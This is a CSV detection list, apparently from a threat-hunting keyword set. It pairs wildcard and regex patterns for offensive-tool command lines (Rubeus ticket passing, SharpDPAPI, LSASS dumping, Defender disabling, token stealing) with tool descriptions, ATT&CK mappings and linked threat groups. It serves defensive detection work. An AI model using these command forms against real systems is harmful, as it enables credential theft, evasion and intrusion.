"*.exe --override-file --source-file *.exe*",".{0,1000}\.exe\s\-\-override\-file\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","4568"
"*.exe --path C:\ -r --method VirtualAlloc*",".{0,1000}\.exe\s\-\-path\sC\:\\\s\-r\s\-\-method\sVirtualAlloc.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","4569"
"*.exe --procdump -p *",".{0,1000}\.exe\s\-\-procdump\s\-p\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","4572"
"*.exe ProcessDLLHijack*",".{0,1000}\.exe\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4573"
"*.exe ps /target:C:\Temp\* /unprotect*",".{0,1000}\.exe\sps\s\/target\:C\:\\Temp\\.{0,1000}\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4574"
"*.exe ptt /ticket:*",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation  Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4575"
"*.exe ptt /ticket:*.kirbi",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}\.kirbi","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4576"
"*.exe -ptt ticket:*.kirbi*",".{0,1000}\.exe\s\-ptt\sticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","4577"
"*.exe --pwsh *.ps1 *.exe*",".{0,1000}\.exe\s\-\-pwsh\s.{0,1000}\.ps1\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4578"
"*.exe -q InterestingProcesses*",".{0,1000}\.exe\s\-q\sInterestingProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4579"
"*.exe -q PowerShell*",".{0,1000}\.exe\s\-q\sPowerShell.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4580"
"*.exe -q WindowsDefender*",".{0,1000}\.exe\s\-q\sWindowsDefender.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4581"
"*.exe RBCD -action read -delegate-to *",".{0,1000}\.exe\sRBCD\s\-action\sread\s\-delegate\-to\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4582"
"*.exe rbcd -m * -p * -c *cmd.exe*",".{0,1000}\.exe\srbcd\s\-m\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4583"
"*.exe rdg /unprotect*",".{0,1000}\.exe\srdg\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4584"
"*.exe RegistryAutoLogons*",".{0,1000}\.exe\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4585"
"*.exe RegistryAutoruns*",".{0,1000}\.exe\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4586"
"*.exe relay -Domain * -CreateNewComputerAccount *",".{0,1000}\.exe\srelay\s\-Domain\s.{0,1000}\s\-CreateNewComputerAccount\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","4587"
"*.exe --remove-reparse --source-file *.exe*",".{0,1000}\.exe\s\-\-remove\-reparse\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","4588"
"*.exe -s * -c service_mod *",".{0,1000}\.exe\s\-s\s.{0,1000}\s\-c\sservice_mod\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","4589"
"*.exe -s *\x*\x*\x*",".{0,1000}\.exe\s\-s\s.{0,1000}\\x.{0,1000}\\x.{0,1000}\\x.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","4590"
"*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\.exe\ss4u\s\/ticket\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4594"
"*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*",".{0,1000}\.exe\ss4u\s\/user\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/altservice\:ldap\s\/ptt\s\/rc4.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4595"
"*.exe --sample-size 1000 --mode 0 --targets dirs.txt*",".{0,1000}\.exe\s\-\-sample\-size\s1000\s\-\-mode\s0\s\-\-targets\sdirs\.txt.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","4596"
"*.exe --sample-size 1000 --mode 1 --targets exts.txt*",".{0,1000}\.exe\s\-\-sample\-size\s1000\s\-\-mode\s1\s\-\-targets\sexts\.txt.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","4597"
"*.exe --schedule * *.exe*",".{0,1000}\.exe\s\-\-schedule\s.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4602"
"*.exe --screensaver *:\*.exe*",".{0,1000}\.exe\s\-\-screensaver\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4603"
"*.exe Search Find-Persist*",".{0,1000}\.exe\sSearch\sFind\-Persist.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","4604"
"*.exe -selfcert -laddr 0.0.0.0:*",".{0,1000}\.exe\s\-selfcert\s\-laddr\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","4605"
"*.exe --session=2 --shadow --console*",".{0,1000}\.exe\s\-\-session\=2\s\-\-shadow\s\-\-console.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","4606"
"*.exe --set-reparse override --source-file *.exe --target-file *",".{0,1000}\.exe\s\-\-set\-reparse\soverride\s\-\-source\-file\s.{0,1000}\.exe\s\-\-target\-file\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","4607"
"*.exe shadowcred -c * -f*",".{0,1000}\.exe\sshadowcred\s\-c\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4609"
"*.exe --showstats -c *\cache.txt*",".{0,1000}\.exe\s\-\-showstats\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","4610"
"*.exe --signature --driver*",".{0,1000}\.exe\s\-\-signature\s\-\-driver.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","4611"
"*.exe silver /sids:*/target:*",".{0,1000}\.exe\ssilver\s\/sids\:.{0,1000}\/target\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","4612"
"*.exe -sniffer n*",".{0,1000}\.exe\s\-sniffer\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","4613"
"*.exe spawn -m rbcd -d *",".{0,1000}\.exe\sspawn\s\-m\srbcd\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4614"
"*.exe spawn -m rbcd -d *",".{0,1000}\.exe\sspawn\s\-m\srbcd\s\-d\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4615"
"*.exe spawn -m shadowcred -d *",".{0,1000}\.exe\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4616"
"*.exe spawn -m shadowcred -d *",".{0,1000}\.exe\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4617"
"*.exe -spn * -redirecthost *",".{0,1000}\.exe\s\-spn\s.{0,1000}\s\-redirecthost\s.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","4618"
"*.exe --spn --domain * --user * --pass *",".{0,1000}\.exe\s\-\-spn\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","4619"
"*.exe spy --pid *",".{0,1000}\.exe\sspy\s\-\-pid\s.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","4620"
"*.exe spy --window *",".{0,1000}\.exe\sspy\s\-\-window\s.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","4621"
"*.exe --startup *:\*.exe*",".{0,1000}\.exe\s\-\-startup\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4622"
"*.exe -t keepass -f *",".{0,1000}\.exe\s\-t\skeepass\s\-f\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","4624"
"*.exe -t startupfolder -c * -a * -f*",".{0,1000}\.exe\s\-t\sstartupfolder\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","4625"
"*.exe -t tortoisesvn -c * -a * -m*",".{0,1000}\.exe\s\-t\stortoisesvn\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-m.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","4626"
"*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*",".{0,1000}\.exe\s\-t\swl\-extract\.dll\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa\s\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","4627"
"*.exe --targettask * --targetbinary  *",".{0,1000}\.exe\s\-\-targettask\s.{0,1000}\s\-\-targetbinary\s\s.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","4628"
"*.exe tgtdeleg*",".{0,1000}\.exe\stgtdeleg.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4629"
"*.exe TokenPrivileges*",".{0,1000}\.exe\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4630"
"*.exe triage",".{0,1000}\.exe\striage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation  Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4631"
"*.exe triage /password:*",".{0,1000}\.exe\striage\s\/password\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4632"
"*.exe -u * -s 2 -c cmd.exe*",".{0,1000}\.exe\s\-u\s.{0,1000}\s\-s\s2\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","4633"
"*.exe -U:T icacls *",".{0,1000}\.exe\s\-U\:T\sicacls\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","4634"
"*.exe -U:T takeown /f*\smartscreen.exe*",".{0,1000}\.exe\s\-U\:T\stakeown\s\/f.{0,1000}\\smartscreen\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","4635"
"*.exe -uac",".{0,1000}\.exe\s\-uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","4636"
